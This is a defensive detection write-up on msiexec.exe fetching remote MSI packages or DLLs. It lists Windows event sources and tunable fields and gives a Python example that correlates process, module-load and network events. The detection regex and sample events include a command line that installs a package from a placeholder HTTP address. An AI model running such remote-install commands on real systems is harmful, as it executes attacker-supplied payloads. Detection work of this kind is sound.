Detection of msiexec.exe execution where command-line arguments reference remote MSI packages, UNC paths, HTTP/HTTPS URLs, or DLLs, correlated with subsequent module loads and/or network connections to previously unseen destinations. The behavioral chain links process creation of msiexec.exe with suspicious parameters, network activity to retrieve payloads, and module loading indicative of malicious installation or DLL execution.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |

| Field | Description |
|---|---|
| SuspiciousCommandlinePatterns | Patterns for identifying malicious msiexec.exe usage (e.g., UNC paths, external domains, DLL execution flags) |
| SuspiciousDestinationList | List of external domains or IP ranges considered suspicious for msiexec network connections |
| TimeWindow | Time range in seconds/minutes for correlating msiexec.exe execution with module load and network activity |
| LegitimateMSIHashes | Hash list of MSI packages considered known-good to reduce false positives |
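A minimal correlation of the three data components and four tunable fields above, written as an added example rather than the analytic's own logic. The normalized event field names, the suspicious-argument regex, the TEST-NET destination prefixes, the known-good hash placeholder and the sample events are all constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Tunables corresponding to the fields above; every value here is constructed for this example.
# Matches http(s) URLs, UNC paths (\\host\share), DLL references, and the /y and /z DLL flags.
SUSPICIOUS_CMDLINE = re.compile(r"https?://|\\\\[^\\\s]+\\|\.dll\b|\s/[yz]\b", re.IGNORECASE)
SUSPICIOUS_DESTS = ("203.0.113.", "198.51.100.")          # TEST-NET prefixes stand in for SuspiciousDestinationList
LEGITIMATE_MSI_HASHES = {"PLACEHOLDER-KNOWN-GOOD-SHA256"}  # 4688 carries no hash; assume an enrichment step adds it
TIME_WINDOW = timedelta(minutes=5)

def is_msiexec_start(e):
    return e["event"] == 4688 and e["image"].lower().endswith("msiexec.exe")

def detect(events):
    """Correlate each suspicious msiexec.exe 4688 with Sysmon 7 (module load) and Sysmon 3
    (network connection) events from the same process inside TIME_WINDOW.
    A real pipeline should also key on the channel, since EventCode values overlap across logs."""
    alerts = []
    for s in filter(is_msiexec_start, events):
        if not SUSPICIOUS_CMDLINE.search(s["cmdline"]) or s.get("hash") in LEGITIMATE_MSI_HASHES:
            continue
        t0 = datetime.fromisoformat(s["time"])
        window = [e for e in events
                  if e["pid"] == s["pid"] and t0 <= datetime.fromisoformat(e["time"]) <= t0 + TIME_WINDOW]
        loads = [e["image_loaded"] for e in window if e["event"] == 7]
        conns = [e["dest"] for e in window if e["event"] == 3 and e["dest"].startswith(SUSPICIOUS_DESTS)]
        if loads or conns:
            alerts.append({"pid": s["pid"], "cmdline": s["cmdline"], "loads": loads, "conns": conns})
    return alerts

# Constructed, normalized events (field names are this example's, not the raw Windows event schema).
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "event": 4688, "pid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://203.0.113.5/update.msi /qn"},
    {"time": "2024-01-01T10:00:02", "event": 3, "pid": 4120, "dest": "203.0.113.5"},
    {"time": "2024-01-01T10:00:05", "event": 7, "pid": 4120, "image_loaded": r"C:\Windows\Installer\MSI1A2B.tmp"},
    # Local package path: no suspicious argument, so the later module load is not correlated.
    {"time": "2024-01-01T10:01:00", "event": 4688, "pid": 5000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\installers\app.msi /qn"},
    {"time": "2024-01-01T10:01:03", "event": 7, "pid": 5000, "image_loaded": r"C:\Windows\Installer\MSI3C4D.tmp"},
    # UNC path, but the package hash is on the known-good list: suppressed as a false positive.
    {"time": "2024-01-01T10:05:00", "event": 4688, "pid": 6000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i \\fileserver\share\agent.msi /qn", "hash": "PLACEHOLDER-KNOWN-GOOD-SHA256"},
    {"time": "2024-01-01T10:05:01", "event": 3, "pid": 6000, "dest": "198.51.100.7"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only the first process trips the chain: its command line references a remote package, and within the window the same pid both connects to a listed destination and loads a module.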